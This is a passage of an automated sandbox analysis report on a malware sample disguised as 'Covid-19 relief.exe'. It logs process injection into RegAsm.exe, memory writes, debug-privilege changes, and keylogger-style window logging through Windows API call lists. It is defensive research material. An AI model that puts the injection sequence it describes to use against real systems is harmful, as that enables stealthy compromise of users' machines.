@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A
            Source: RegAsm.exe, 00000002.00000002.921244963.000000000113A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: RegAsm.exe, 00000002.00000002.921244963.000000000113A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_00409908
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B01CB mov eax, dword ptr fs:[00000030h]1_2_057B01CB
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD mov ecx, dword ptr fs:[00000030h]1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD mov eax, dword ptr fs:[00000030h]1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B01CB mov eax, dword ptr fs:[00000030h]1_2_057B01CB
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD mov ecx, dword ptr fs:[00000030h]1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD mov eax, dword ptr fs:[00000030h]1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057901CB mov eax, dword ptr fs:[00000030h]3_2_057901CB
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057900AD mov ecx, dword ptr fs:[00000030h]3_2_057900AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057900AD mov eax, dword ptr fs:[00000030h]3_2_057900AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Contains functionality to inject code into remote processesShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0040F219
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_0040F219
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A88008Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C18008Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A88008Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C18008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe2_2_0040A5F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe2_2_0040A5F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe5_2_0040A5F5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00410145
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_00410145
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Users\user\Desktop\Covid-19 relief.exe 'C:\Users\user\Desktop\Covid-19 relief.exe' Jump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: Program Manager380KR
            Source: logs.dat.2.drBinary or memory string: [ Program Manager ]
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: Program Manager0|
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: |Program Manager
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: |Program Manager|
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: Program Manager380KR
            Source: logs.dat.2.drBinary or memory string: [ Program Manager ]
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: Program Manager0|
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: |Program Manager
            Source: Covid-19 relief.exe, 00000001.00000002.921950434.0000000001160000.00000002.00000001.sdmp, RegAsm.exe, 00000002.00000002.921540631.0000000001630000.00000002.00000001.sdmp, Covid-19 relief.exe, 00000003.00000002.922405058.0000000001130000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: RegAsm.exe, 00000002.00000002.921497745.0000000001426000.00000004.00000040.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004124A0 cpuid 2_2_004124A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004124A0 cpuid 2_2_004124A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,2_2_00409E7D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,2_2_00409E7D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,5_2_00409E7D
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Users\user\Desktop\Covid-19 relief.exe VolumeInformationJump to behavior
